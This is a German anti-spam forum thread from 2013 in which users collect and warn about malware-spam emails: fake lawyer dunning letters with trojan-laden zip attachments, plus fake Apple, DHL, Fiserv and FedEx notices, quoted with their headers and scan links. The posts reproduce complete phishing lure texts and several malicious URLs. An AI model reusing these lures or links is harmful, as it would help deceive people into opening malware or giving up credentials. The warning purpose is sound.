Im Anhang ist eine Zip-Datei, die auch meinen Namen im Dateinamen enthält. Darin befindet sich eine .com-Datei mit einem Trojaner.

Ich weiß, "Mahnungen" mit Zip im Anhang sind ein alter Hut. Diese hier hat mich aber doch etwas verwirrt, da ich mit vollem Namen angesprochen werde:

Im Anhang ist eine Zip-Datei, die auch meinen Namen im Dateinamen enthält. Darin befindet sich eine .com-Datei mit einem Trojaner.


War bei mir auch der Fall. Die Mailadresse habe ich bei einigen Online-Shops verwendet. Welcher von denen undicht ist und Pampers braucht, läßt sich im Nachhinein nicht feststellen. Ich werde aber dazu übergehen, für jeden Shop eine eigene Mailadresse zu verwenden.

Sehr geehrter Kunde,

mit dem abgeschlossenem Vertrag vom 18.05.2013 haben Sie sich gesetzlich verpflichtet die Summe von 437,00 Euro an unseren Mandanten zu begleichen. Dieser Verpflichtung sind Sie bis heute nicht nachgekommen. Weiterhin sind Sie aus Gründen des Verzuges gezwungen die Kosten unserer Leistung zu tragen.

Unsere Kanzlei wurden vom Unternehmen Hse24 Shop Online GmbH beauftragt die finanziellen Interessen zu vertreten. Die ordnungsgemäße Bevollmächtigung wurde anwaltlich schriftlich zugesichert.

Diese belaufen sich nach folgender Kostenrechnung:

13,00 Euro (nach Nummer 3386 RGV)
14,00 Euro (Vergütung gemäß RVG § 4 Abs. 1 und 2)

Wir verpflichten Sie mit Kraft unserer Mandantschaft den Gesamtbetrag auf das Konto unseren Mandanten zu übersenden. Die Bankdaten und die Einzelheiten Ihrer Bestellung finden Sie im angehängtem Ordner. Für den Eingang der Zahlung geben wir Ihnen eine gesetzliche Frist bis zum 22.06.2013.

Mit freundliche Grüßen Lotta Herrmann Rechtsanwalt



Absender: hajo2009 [at] live.de

Das könnte sich um den schon einschlägig bekannten Trojaner / Virus im Anhang handeln...

http://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung

@Mods, evt. tackern?

Gruß
Kai

Danke für den Hinweis

Tacker weglege

Sehr geehrter Kunde,

mit dem ausgeführtem Auftrag vom 29.04.2013 haben Sie sich vertraglich verpflichtet die Summe von 551,00 Euro an unseren Mandanten zu zahlen. Dem sind Sie bis jetzt nicht nachgekommen. Weiterhin sind Sie aus Gründen des Verzuges gezwungen die Ausgaben unserer Leistung zu tragen.

Unser Anwalt-Büro wurden vom Unternehmen Real-onlineshop Online GmbH AG beauftragt die gesetzlichen Interessen zu vertreten. Die ordnungsgemäße Bevollmächtigung wurde anwaltlich schriftlich versichert.

Diese ergeben sich nach dieser Abrechnung:

18,00 Euro (nach Nummer 5737 RGV)
8,00 Euro (Pauschalvergütung gemäß RVG § 4 Abs. 1 und 2)

Wir zwingen Sie mit Kraft unserer Mandantschaft den Gesamtbetrag auf das Konto unseren Mandanten zu überweisen. Die Kotonummer und die Einzelheiten der Bestellung finden Sie im angehängtem Ordner. Für den Eingang der Zahlung setzten wir Ihnen eine gesetzliche letzte Frist bis zum 24.06.2013.

Mit freundliche Grüßen Raphael Horn Anwaltschaft



Absender ist info [at] bossthron.de

Tipp- und Grammatikfehler stehen so in der ursprünglichen Mail. Das Deutsch ist an manchen Stellen ein wenig holprig. Meine Mailadresse ist in diesem Fall mit einem Nickname verknüpft, den ich in einem Onlinespiel verwendet habe. Besagtes Onlinespiel hat keine kostenpflichtigen Komponenten und unter dem Nick bin ich schon seit 4 oder 5 Jahren nicht mehr dort registriert.

Wir zwingen Sie mit Kraft unserer Mandantschaft
Wenn der Absender echt wäre, wäre meine Antwort: na dann zwingen Sie mal schön. Eine Virenschleuder wird sich davon leider nicht beeindrucken lassen.

Wuschel

Und eine neue Runde:


Sehr geehrter Westfalia Shop Online GmbH Kunde **** ****,

mit Ihrer Bestellung vom 01.05.2013 haben Sie sich vertraglich verpflichtet die Rechnung von 745,00 Euro an Westfalia Shop Online GmbH zu zahlen.

Der Betrag ist bis jetzt nicht bei unseren Mandanten eingegangen.

Weiterhin sind Sie aus Gründen des Verzuges dazu verpflichtet die Kosten unserer Leistung zu tragen.

Unser Anwalt-Büro wurden vom Unternehmen Westfalia Shop Online GmbH beauftragt die gesetzlichen Interessen zu vertreten. Die ordnungsgemäße Bevollmächtigung wurde anwaltlich schriftlich versichert.

Die zusätzlichen Kosten unserer Tätigkeit errechnen sich nach dieser Kostenrechnung:

****************
13,00 Euro (nach Nummer 8574 RGV)
3,00 Euro (Pauschale gemäß RVG § 4 Abs. 1 und 2)
****************

Wir zwingen Sie mit Kraft unserer Mandantschaft den gesamten Betrag auf das Konto unseren Mandanten zu übersenden. Die Kontodaten und die Lieferdaten der Bestellung finden Sie im angehängtem Ordner. Für den Eingang der Zahlung geben wir Ihnen eine letzte Frist bis zum 26.06.2013.

Mit freundliche Grüßen Dennis Arnold Rechtsanwalt


(Header liegt nicht vor, Mail wurde als Anhang weitergeleitet)

Bei mir ist der Rotz unter dem hochtrabendem Titel "Kostenrechnung an Meiner Einer Anwaltschaft Mandantschaft Dell Online Store GmbH 17.06" auch eingeschlagen.


Return-Path: freundin1981 [at] gmx.net
Received: from mout.gmx.net ([212.227.17.22]) by mx-ha.gmx.net (mxgmx001) with ESMTP (Nemesis) ID: [ID filtered]
Received: from mailout-de.gmx.net ([10.1.76.24]) by mrigmx.server.lan (mrigmx001) with ESMTP (Nemesis) ID: [ID filtered]
Received: (qmail invoked by alias); 17 Jun 2013 xx:xx:xx -0000
Received: from athedsl-387232.home.otenet.gr (EHLO User-PC) [79.131.64.158] by mail.gmx.net (mp024) with SMTP; 17 Jun 2013 xx:xx:xx +0200
X-Authenticated: #23857393
X-Provags-ID: [ID filtered]
From: "Jonah Weiss Rechtsanwalt" <freundin1981 [at] gmx.net>
To: "Meiner Einer" <poor [at] spamvictim.tld>
Subject: Kostenrechnung an Meiner Einer Anwaltschaft Mandantschaft Dell Online Store GmbH 17.06.2013
Date: Mon, 17 Jun 2013 xx:xx:xx GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC75B0B791"
X-Y-GMX-Trusted: 0
Envelope-To: <poor [at] spamvictim.tld>
X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)




Sehr geehrter Dell Shop GmbH Kunde Meiner Einer,

mit dem Auftrag vom 26.05.2013 haben Sie sich gesetzlich verpflichtet den Betrag von 368,00 Euro an Dell Shop GmbH zu begleichen.

Die Summe ist bis jetzt nicht bei Dell Shop GmbH eingegangen.

Weiterhin sind Sie aus Gründen des Verzuges dazu verpflichtet die Kosten unserer Leistung zu tragen.

Unsere Anwaltskanzlei wurden von Dell Shop GmbH beauftragt die gesetzlichen Interessen zu vertreten. Die ordnungsgemäße Bevollmächtigung wurde notariell schriftlich versichert.

Die zusätzlichen Kosten unserer Tätigkeit errechnen sich nach dieser Abrechnung:

########################
14,00 Euro (nach Nummer 5577 RGV)
3,00 Euro (Vergütung gemäß RVG § 4 Abs. 1 und 2)
########################

Wir zwingen Sie mit Kraft unserer Mandantschaft den gesamten Betrag auf das Bankkonto unseren Mandanten zu übersenden. Die Kotonummer und die Einzelheiten der Bestellung finden Sie im angehängtem Ordner. Für den Eingang der Zahlung setzten wir Ihnen eine gesetzliche letzte Frist bis zum 24.06.2013.

Mit freundliche Grüßen Jonah Weiss Rechtsanwalt


:skull: Und dazu ne ZIP-Datei mit vermutlich ausgesprochen ekligem Inhalt. :skull:

Ich kenne weder eine Dell Shop GmbH, noch erinnere ich mich daran am 26.05.2013
überhaupt irgendwo, irgendwas und zu irgendeinem Preis beauftragt zu haben.
Und Anzeichen von Senilität wurden bei mir bisher auch nicht diagnostiziert.:D

X-UIDL-JANA-SERVER: [UID filtered]
Return-Path: kazky [at] cablenet.com.cy
Received: from spam-fw.nic-west.cy.cablenet-as.net ([213.140.208.230]) by
mx-ha.gmx.net (mxgmx003) with ESMTP (Nemesis) ID: [ID filtered]
=?utf-8?q?<me>;?= Mon, 17 Jun 2013 xx:xx:xx +0200
X-ASG-Debug-ID: [ID filtered]
Received: from mail0-nic.wavespeed.net (mail0-nic.wavespeed.net [213.140.209.232]) by spam-fw.nic-west.cy.cablenet-as.net with ESMTP ID: [ID filtered]
X-Barracuda-Envelope-From: kazky [at] cablenet.com.cy
X-Barracuda-Apparent-Source-IP: 213.140.209.232
Received: from localhost (localhost.localdomain [127.0.0.1])
by mail0-nic.wavespeed.net (Postfix) with ESMTP ID: [ID filtered]
for <me>; Mon, 17 Jun 2013 xx:xx:xx +0300 (EEST)
Received: from mail0-nic.wavespeed.net ([127.0.0.1])
by localhost (mail0-nic.wavespeed.net [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP ID: [ID filtered]
Mon, 17 Jun 2013 xx:xx:xx +0300 (EEST)
Received: from Skf-016 (dslb-084-063-225-083.pools.arcor-ip.net [84.63.225.83])
by mail0-nic.wavespeed.net (Postfix) with ESMTPSA ID: [ID filtered]
for <me>; Mon, 17 Jun 2013 xx:xx:xx +0300 (EEST)
From: "Ronja Vigt Anwaltschaft" <kazky [at] cablenet.com.cy>
To: "me>
Subject: me Ihre Inkasso Aufforderung 17.06.2013
Date: Mon, 17 Jun 2013 xx:xx:xx GMT
X-ASG-Orig-Subj: me Ihre Inkasso Aufforderung 17.06.2013
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XCAF48AF27"
Message-ID: [ID filtered]
X-Barracuda-Connect: mail0-nic.wavespeed.net[213.140.209.232]
X-Barracuda-Start-Time: 1371476059
X-Barracuda-URL: http://213.140.208.230:8000/cgi-mod/mark.cgi
X-Virus-Scanned: by bsmtpd at cy.cablenet-as.net
X-Barracuda-BRTS-Status: 1
X-Barracuda-Spam-Score: 3.06
X-Barracuda-Spam-Status: No, SCORE=3.06 using global scores of TAG_LEVEL=1000.0 QUARANTINE_LEVEL=1000.0 KILL_LEVEL=7.0 tests=BSF_SC0_EXE_IN_ZIP, FORGED_MUA_OUTLOOK, MSOE_MID_WRONG_CASE
X-Barracuda-Spam-Report: Code version 3.2, rules version 3.2.2.134173
Rule breakdown below
pts rule name description
---- ---------------------- --------------------------------------------------
1.00 BSF_SC0_EXE_IN_ZIP BODY: Custom Rule BSF_SC0_EXE_IN_ZIP
0.70 MSOE_MID_WRONG_CASE MSOE_MID_WRONG_CASE
1.36 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook
Envelope-To: <me>
X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)




Text:

Sehr geehrte/r me
mit der Bestellung vom 09.04.2013 haben Sie sich rechtlich verpflichtet die Rechnung von 640,00 Euro an Karstadt GmbH Online zu überweisen.

Dieser Pflicht sind Sie bis jetzt nicht nachgekommen.

Weiterhin sind Sie aus Gründen des Verzuges dazu verpflichtet die Ausgaben unserer Leistung zu tragen.

Unsere Anwaltskanzlei wurden von Karstadt GmbH Online beauftragt die gesetzlichen Interessen zu vertreten. Die Bevollmächtigung wurde anwaltlich zugesichert.

Die zusätzlichen Kosten unserer Beauftragung errechnen sich nach folgender Kostenrechnung:

--------------------
17,00 Euro (nach Nummer 5891 RGV)
12,00 Euro (Pauschale gemäß RVG § 4 Abs. 1 und 2)
--------------------

Wir verpflichten Sie mit Kraft unserer Mandantschaft den Gesamtbetrag auf das Konto unseren Mandanten zu übersenden. Die Kotonummer und die Lieferdaten der Bestellung finden Sie im angehängtem Ordner. Für den Eingang der Zahlung geben wir Ihnen eine gesetzliche Frist bis zum 22.06.2013.

Mit freundliche Grüßen Ronja Vigt Anwaltschaft


Sehr freundlich diese Anwaltschaft und schickt mir einen Anhang.zip mit ca 100 kb mit.
Habs in die Quarantäne verschoben, falls jemand das zip haben möchte. ;)
Mittlerweile kann ich über so einen Mist auch nicht mehr lachen.
Ich kenne einige, die aus Angst dann den Anhang öffnen, weil die Tochter oder der Sohn schon wieder mal was bestellt haben könnten.
Könnte ich mich irren oder ist der Name bewußt gewählt? Ronja *** Anwaltschaft?:D:cool:

Gruß Levy

Das sind keine Mugus, da geht es darum, Dich dazu zu bewegen, den schädlingsverseuchten Anhang zu öffnen. Ich tacker' das gleich mal an den passenden Fred.

Schönen Gruß
Mittwoch

Wieder mal mit hoher Sicherheit ein Virendownload:

Received: from mail.tarateck-hosting.de ([62.112.152.149]) by mx-ha.gmx.net
(mxgmx007) with ESMTP (Nemesis) ID: [ID filtered]
Received: by mail.tarateck-hosting.de (Postfix, from userID: [ID filtered]


Chérr(e) client(e)

Nous vous informons que votre compte vas s'expirée dans moins de 48
heures, il
est impérratif d'effectué une verification de vos informations dés
prérsent,
sans que votre compte sera détruit. Cliquez simplement sur le lien
ci-dessous et
ouvrer une session a l'aide de votre Apple ID: [ID filtered]

Vérfiez maintenat. http://vloutis.gr/dr.php

Merci, L'assistance a la clientérle Apple

IP: 85.17.123.9 ---> alpha.ideodromio.gr/Leaseweb

Spamweb mal wieder, da wundert einen gar nichts mehr...

Achtung,Achtung!

Heute erhalten.
Sehr geehrte/r XXX,XXX

unsere Kanzlei wurden von Computeruniverse Online Store GmbH beauftragt die finanziellen Rechte zu vertreten. Die Bevollmächtigung wurde anwaltlich schriftlich versichert.

Durch die online Bestellung vom 12.04.2013 haben Sie sich vertraglich verpflichtet die Summe in Höhe von 480,00 Euro an Computeruniverse Online Store GmbH zu zahlen.

Dieser Pflicht sind Sie bis jetzt nicht nachgekommen. Weiterhin sind Sie verpflichtet die Ausgaben unserer Inanspruchnahme im vollen Umfang zu zahlen.

Wir verpflichten Sie gesetzlich den Gesamtbetrag auf das Bankkonto unseren Mandanten zu überweisen. Die Kotonummer und die Lieferdaten Ihrer Bestellung finden Sie im Anhang. Für den Eingang der Zahlung geben wir Ihnen eine gesetzliche letzte Frist bis zum 24.06.2013.

Mit freundliche Grüßen
Nelli Ziegler Inkasso Anwaltschaft

Ich glaube ATU war noch nicht an der Reihe:


Verehrter ATU Kunde,

unsere Anwaltskanzlei wurden heute am 03.07.2013 vom Unternehmen ATU Online GmbH beauftragt Ihre finanziellen Interessen in Ihrem Fall zu schützen.

Mit der Bestellung im Online Shop vom 24.05.2013 haben Sie sich gesetzlich verpflichtet die Summe in Höhe von 690,00 Euro an unseren Mandanten zu begleichen. Die Lieferung erfolgte an die angegebene Adresse und ist nachweisbar.

Dem sind Sie bis jetzt nicht nachgekommen, obwohl Sie sich in Zahlungsverzug befinden und mit sehr erheblichen Kosten und Unannehmlichkeiten rechnen sollten.

Wir bitten Sie, den fälligen Betrag so bald wie möglich auf das Bankkonto von ATU Online GmbH zu überweisen.

Die Kontodaten und weitere Einzelheiten der Bestellung sehen Sie im Anhang. Für den Eingang des Betrags geben wir Ihnen eine gesetzliche Frist bis zum 07.07.2013. Gegebenenfalls können Sie die ausstehende Rechnung aber in angemessenen Monatsraten bezahlen, falls ein akzeptabler Vorschlag innerhalb der Frist bei uns eintrifft.

Mit besten Grüßen
Laura Huber Anwalt Buro

Die Phisher lernen dazu. Korrekte Grammatik und Rechtschreibung, ansonsten die übliche Zip-Datei im anhang.

Hier der zugehörige Header, meine Mailadresse habe ich durch ... ersetzt.
From Anwalt Laura Huber Wed Jul 3 xx:xx:xx 2013
X-Apparently-To: ... via 188.125.83.133; Wed, 03 Jul 2013 xx:xx:xx +0000
Return-Path: <denismarco [at] videotron.ca>
Received-SPF: none (domain of videotron.ca does not designate permitted sender hosts)
bGVpIHd1cmRlbiBoZXV0ZSBhbSAwMy4wNy4yMDEzIHZvbSBVbnRlcm5laG1l
biBBVFUgT25saW5lIEdtYkggYmVhdWZ0cmFndCBJaHJlIGZpbmFuemllbGxl
biBJbnRlcmVzc2VuIGluIElocmVtIEZhbGwgenUgc2Now7x0emVuLiBNaXQg
ZGVyIEJlc3RlbGx1bmcgaW0gT25saW5lIFNob3Agdm9tIDI0LjA1LjIwMTMg
aGFiZW4gU2llIHNpY2ggZ2VzZXR6bGljaCB2ZXJwZmxpY2h0ZQEwAQEBAQN0
ZXh0L3BsYWluAwMyAkFUVSBPbmxpbmUgR21iSCBLb3N0ZW5yZWNobnVuZyAw
My4wNy4yMDEzLnppcANhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0DAzExMQ--
X-YMailISG: bfxnGrkWLDtCzGxd.UFEzEPkHJVH.AgFFcWB2zANPjMX0eE8
1q3MocO3ee8H5sQp73Em_lGxpjWGdbtBNKjmu5vgQxWQJ4jgAHr9Yume6Bgc
Dt7yyPqtZZFtLf7QsznvdjTXBu4SMWvQn8uTfOFFFgMkuKTp1RjOzVzvl96Z
ENds6mBrvaom2689xXAJLGT7TAmvJxztWirC3wxCsKT34Xr5IV3e0O3CiBpU
56.OgyF5djX2VbinylnETKlGJMQac_t6m.Dc6aSrpH5KxPjMJLh9CmrSR8S6
cQB9FJk0xLbx_dQyNQDCwvuWdTxdoqWj5gtIxaRjHXnSXYoG2fy3kdm1W1ox
YkvlWxbO7mrrsbPYlQiwM8o9hCnL7A44Z8SiYIG3ObQeb5TUPi6545C_1Sry
woFOdEeksVT2MC5LqkaI6UwVde1k94TFCYc0AtKRF6W7psIPAvzbUoleO9O9
2.4HspSofWd4D0CmfZIPE5P4dO8S.Fsu9d1RYcKW.Td59gdsNUxKrSu5UclJ
.clb05ggMqCDkaZu_7I6JD9xtFnfWqTFRU8UAHIVOEr1DWvakmHhWazkA7Z0
8X8Y8dG7V_ToWlUXGw9gn13LtOOA7wDFYZcJ5R40ZuXsjpweftQREkRVTqG6
8kcB7lV0AdKxeNwx9nh6NCqgn33Mxf9sr93Us0ZC__vh8qm9F2kuiaK7xqr7
UNvGRuB5b7x0fBD35eX19GHfTxxw_LAjVtq63JSK2ceO6T8BYCtS1.TsvecT
HjDRkv.JS5nnYOU5nfYJYAYJMYsU.PEwpQRfRVlv.zcm_nwAeQj5lp5sirWQ
agA6NMGHZPe5HRuRo5dhYurRBJhfE6adPu1iXk6mWp.0cVQ5pbHB3F0GpwBU
A0zda_PwMiuh0_OtR.IM1M4jSU4cAaVx0gIwkmBAsDFLx_eDcp_PrVlJyRcp
XBGKKMNZDErw5yNPEZ7mZWUrjXgUu4tnHDvfMYzKDY1lndEBi0lNbtSPla5x
NgpoOXnu6DHJsJL62hpXk0C6Z.OIVq.9cOKZHm1_qgONcp3bX32l7UwpppgX
dwYuuqHcMBkH2Yb2tQMT7zNhuz9GJEHHMCEiJcwYIya9ECLKN4ySgYI3XARI
5NT64b.mGLl9Jckjt0l45lECPDc9csWkUszgMhlipz.6KEMbcMJ3DtWh4I8i
uCbsYs_3rCP5xxttDf8OTk_U67I5UYNPXq6.GU1bWu02xvs9AC0p2qLlbob8
pRPdBYbn.jqqGiBc6qTZrwXstN9VYaP3qGA0QiQ2Cb4NPOXEEQ--
X-Originating-IP: [24.201.245.36]
Authentication-Results: mta1058.mail.ird.yahoo.com from=videotron.ca; domainkeys=neutral (no sig); from=videotron.ca; dkim=neutral (no sig)
Received: from 127.0.0.1 (EHLO relais.videotron.ca) (24.201.245.36)
by mta1058.mail.ird.yahoo.com with SMTP; Wed, 03 Jul 2013 xx:xx:xx +0000
MIME-version: 1.0
Content-type: multipart/mixed; boundary="Boundary_(ID_tOH7/IdA6bJwPlIEPvsj8g)"
Received: from JAKOB-LENOVO21
(ppp-188-174-71-23.dynamic.mnet-online.de [188.174.71.23])
by VL-VM-MR003.ip.videotron.ca
(Oracle Communications Messaging Exchange Server 7u4-22.01 64bit (built Apr 21
2011)) with ESMTPA ID: [ID filtered]
...; Wed, 03 Jul 2013 xx:xx:xx -0400 (EDT)
Message-ID: [ID filtered]
From: Anwalt Laura Huber <denismarco [at] videotron.ca>
To: ...Meine Mailaddi
Subject: Inkasso Beauftragung von ATU Online GmbH
Date: Wed, 03 Jul 2013 xx:xx:xx +0000 (GMT)
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Length: 114917

Korrekte Grammatik und Rechtschreibung,

Davon sind sie weit entfernt.

Davon sind sie weit entfernt.

Beim schnellen durchlesen. Immerhin hört es sich nicht mehr so holprig an wie bei früheren Mails.

Received: from mx-01.ngi-net.de ([5.9.41.38]) by mx-ha.gmx.net (mxgmx109)
with ESMTP (Nemesis) ID: [ID filtered]
<x>; Thu, 25 Jul 2013 xx:xx:xx +0200
Received: from Grazyna-PC (dyn-cdma-84-44-180-48.netcologne.de [84.44.180.48])
by mx-01.ngi-net.de (Postfix) with ESMTPSA ID: [ID filtered]
for <x>; Thu, 25 Jul 2013 xx:xx:xx +0200 (CEST)

Guten Tag Pseudofirmenname Kunde,

Sie haben Ihre Bestellung vom 15.06.2013 bis heute nicht beglichen. Die Rechnung konnte nicht von Ihrem Bankkonto abgebucht werden.

Aus diesem Grund wurde unsere Anwalts-Kanzlei beauftragt die vertraglichen Rechte der Firma Pseudofirmenname zu schützen.

Die Summer der Bestellung inklusive der Versandkosten ist 404,62 Euro. Dabei wird Ihnen eine Mahngebühr von 19,00 Euro berechnet und die Kosten unserer Tätigkeit von 12,14 Euro.

Sie haben bis zum 28.07.2013 die letzte Chance das Geld an die im Vertrag angegebene Kontonummer zu überweisen. Falls Sie die Zahlung verweigern sehen wir und gezwungen ein Gerichtsverfahren gegen Sie anzustreben.
Die Lieferdaten Ihrer Bestellung und die Kontodaten sehen Sie im angehängten Ordner.

Anhang vom 25.07.2013
- Übersicht der Bestellung
- Bankdaten

Mit besten Grüßen

A* S*
Inkasso Anwaltschaft
Im Anhang eine Inkasso Mahnung Sanicare Gmbh & Co. AG vom 25.07.2013.zip:
https://www.virustotal.com/en/file/082c4cdab407b682f2054e2c7daf2faca4e5c24949c8954561dd35d68c3f1386/analysis/1374744571/
http://i.imagebanana.com/img/f7kwbz6b/thumb/001.jpg (http://www.imagebanana.com/view/f7kwbz6b/001.jpg)
http://virusscan.jotti.org/de/scanresult/a645965f9cd94912cf107e14aca285b6a98c14d1
http://i.imagebanana.com/img/wxeilx5b/thumb/002.jpg (http://www.imagebanana.com/view/wxeilx5b/002.jpg)

Und wieder mal:

Received: from res01.greatnet.de (res01.greatnet.de [83.133.95.14])
(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
(No client certificate requested)
by xxxxx (Postfix) with ESMTPS ID: [ID filtered]
for xxxxx; Sun, 28 Jul 2013 xx:xx:xx +0200 (CEST)
Received: by res01.greatnet.de (Postfix, from userID: [ID filtered]
ID: [ID filtered]


DHL

DHL Notification
Tracking ID: [ID filtered]
Status: Shipment not delivered

Your parcel has arrived at July 24th. Courier was unable to deliver
the parcel to you.

To get additional information use any of these options:

1) Go to the following URL in your browser:

Get Shipment Info

2) Enter the Tracking ID: [ID filtered]

Tracking Page

Disclaimer:
This message was created by DHL System.
No authentication of email address has been performed.

Deutsche Post DHL

2013 DHL International GmbH. All rights reserved.

http://abeiro.es/main.php?info=1fRgNUiBigtd4WSclYRWnA==
IP: 185.2.129.180 ---> REDCORUNA, ES

Derzeit werden von einem uns unbekannten Dritten gefälschte Lidl E-Mails versendet. Diese erwecken den Anschein von Lidl zu stammen. Es wird insbesondere die Absenderadresse rechnung-noreply [at] lidl-shop.de genutzt.

Lidl.de (http://www.lidl.de/de/Aktuelles?cUid=1)

Diese Inkassoschreiben inklusive (wahrscheinlich) verseuchtem Link werden jetzt auch per SMS verschickt, wohl in der Annahme, daß die meisten Empfänger ein Smartphone haben.
Inkasso-Büro fordert per SMS Geld ein (http://www.svz.de/nachrichten/home/top-thema/artikel/inkasso-buero-fordert-per-sms-geld-ein.html?tx_ttnews[backPid]=111&cHash=988ac99cf8520e97d5001ab146be7da7)

Received: from wan.qualifirst.iasl.com ([206.210.96.171]) by mr4.firma.tld
with esmtp (envelope-from <welcome [at] aexp.com>) ID: [ID filtered]
Sep 2013 xx:xx:xx +0200
Received: from 206.210.96.171(helo=cewlgoq.xupbx.info) by
wan.qualifirst.iasl.com with esmtpa (Exim 4.69) (envelope-from ) id
1MM6YH-7511so-OG for poor [at] spamvictim.tld; Fri, 6 Sep 2013 xx:xx:xx -0500
Received: from 206.210.96.171 (account welcome [at] aexp.com HELO
oguudkrzpjp.tussn.ru) by wan.qualifirst.iasl.com (CommuniGate Pro SMTP 5.2.3)
with ESMTPA ID: [ID filtered]
-0500
Date: Fri, 6 Sep 2013 xx:xx:xx -0500
From: Fiserv <Lemuel_Katz [at] fiserv.com>
Message-ID: [ID filtered]
To: verschiedene Adressen
Subject: FW: Scanned Document Attached
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------633B899C6FC5AB"


Dear Business Associate:

Protecting the privacy and security of client, company, and employee
information is one of our highest priorities. That is why Fiserv has
introduced the Fiserv Secure E-mail Message Center - a protected e-mail
environment designed to keep sensitive and confidential information
safe. In this new environment, Fiserv will be able to send e-mail
messages that you retrieve on a secured encrypted file.

You have an important message from Reggie_Courtney [at] fiserv.com.
To see your message, use the following password to decrypt attached file: JkSIbsJPPai

If this is your first time receiving a secure file from the
Fiserv Secure E-mail Message Center, you will be prompted to set up a
user name and password.

This message will be available until Saturday Sep 07, 2013 at xx:xx:xx
EDT4

If you have any questions, please contact your Fiserv representative.

Sincerely,
Your Associates at Fiserv

Additional information about Fiserv Secure E-mail is available by
entering http://www.fiserv.com/secureemail/ into your Web browser and
pressing Enter.


The information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify your representative immediately and delete this message from your computer. Thank you.

Angehängt war eine FSEMC.esl.zip (Inhalt FSEMC.06092013.exe), laut https://www.virustotal.com/de/ handelt sich dabei um einen Win32/TrojanDownloader.Small.PRL


Eniac

Wieder als Dateianhang:

Received: from mail.pelhamonline.com (mail.pelhamonline.com [216.170.66.2])
by xxxxx (Postfix) with ESMTP ID: [ID filtered]
for xxxxx; Tue, 10 Sep 2013 xx:xx:xx +0200 (CEST)
Received: from [23.38.75.68] (helo=tknsrtrjtmai.muvpebavj.com) by mail.pelhamonline.com with esmtpa (Exim 4.69) (envelope-from ) ID: [ID filtered]

Leider sehr vermurkst, da HTML formattiert:


This is to confirm that one or more items in your order has been
shipped. Note that multiple items in an order may be shipped
separately.
You can review complete details of your order on the Order
History page
Thanks for choosing FedEx.
Order Confirmation Number: 8477728

Order Date: 09/09/2013

Redemption Item Quantity Tracking Number

Paper, Document2

fedex.com Follow FedEx: You may receive separate e-mails with tracking information for
reward ordered.
My FedEx Rewards may be modified or terminated at any time without
notice. Rewards points available for qualifying purchases and certain
exclusions apply. For details and a complete listing of eligible
products and services please read My FedEx Rewards Terms and
Conditions .
©2012 FedEx. The content of this message is protected by copyright
and trademark laws under U.S. and international law. Review our
privacy policy . All rights reserved.

im Anhang: Order history page.zip

http://virusscan.jotti.org/de/scanresult/0568c25d60a31962432ed38378b574c8086c81a5

https://www.virustotal.com/de/file/a73e9eadfaabbfb4f688bc2a739ce5a1daf1380788a1bda5f31fb6dad17c760a/analysis/1378829644/

Hallo zusammen,

folgendes ist grade bei mir aufgeschlagen mit der üblichen, vermutlich virenverseuchtem 94,2KB Zipdatei im Anhang.
Man beachte auch die Rechtschreibung und die Grammatik.


Guten Tag Online Kunde,

der Abzug von Ihrem Bankkonto für die Bestellung vom 19.08.2013 konnte nicht durchgeführt werden. Es wurden alle Geldeingänge bis zum 11.09.2013 berücksichtigt.

Die Summer der Bestellung inklusive der Versandkosten ist 147,03 Euro. Unser Anwaltsbüro wurde berechtigt des ausstehenden Betrag für Ihre Bestellung einzufordern. Zuzüglich wird Ihnen eine Mahngebühr von 28,00 Euro berechnet und die Kosten unserer Beauftragung von 41,68 Euro.

Weitere Einzelheiten der Bestellung und die Kontodaten sind im Anhang. Falls Sie die Zahlung nicht tätigen sehen wir und gezwungen ein Gerichtsverfahren gegen Sie anzustreben. Sie haben bis zum 14.09.2013 Zeit das Geld zu zahlen.

Mit freundlichen Grüßen

Lukas Haas Anwaltskanalei

Hervorhebungen durch mich.

Return-Path: <silv.bau [at] t-online.de>
Received: from mailout03.t-online.de (mailout03.t-online.de [194.25.134.81])
(using TLSv1 with cipher AES256-SHA (256/256 bits))
(No client certificate requested)
by mtain-db04.r1000.mx.aol.com (Internet Inbound) with ESMTPS ID: [ID filtered]
for <poor [at] spamvictim.tld>; Wed, 11 Sep 2013 xx:xx:xx -0400 (EDT)
Received: from fwd08.aul.t-online.de (fwd08.aul.t-online.de )
by mailout03.t-online.de with smtp
ID: [ID filtered]
Received: from Doreen (VU0cW6ZGQhKid-aLalKt9sh+nxYAjvMSdoQMfJAAL8Z-NLCeVSJk0ALwiHZqL2Qw8Z@[2.202.191.242]) by fwd08.t-online.de
with esmtp ID: [ID filtered]
From: "MahnbescheID: [ID filtered]
To: "keine Name" <poor [at] spamvictim.tld>
Subject: 11.09.2013 Ihre Kontoabbuchung ist gescheitert
Date: Wed, 11 Sep 2013 xx:xx:xx GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106

Gruß Frechdachs

From: - Mon Sep 16 xx:xx:xx 2013
X-Account-Key: account6
X-UIDL: [UID filtered]
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
X-Envelope-From: <cainsyp264 [at] autoweek.nl>
X-Envelope-To: <poor [at] spamvictim.tld>
X-Delivery-Time: 1379321527
X-UID: [UID filtered]
Return-Path: <cainsyp264 [at] autoweek.nl>
X-RZG-MI-VALUES: bm=0 mafl=1 sh=0 du=0 sp=2,1 vv=1 nf=0
X-Strato-MessageType: email
X-RZG-CLASS-ID: [ID filtered]
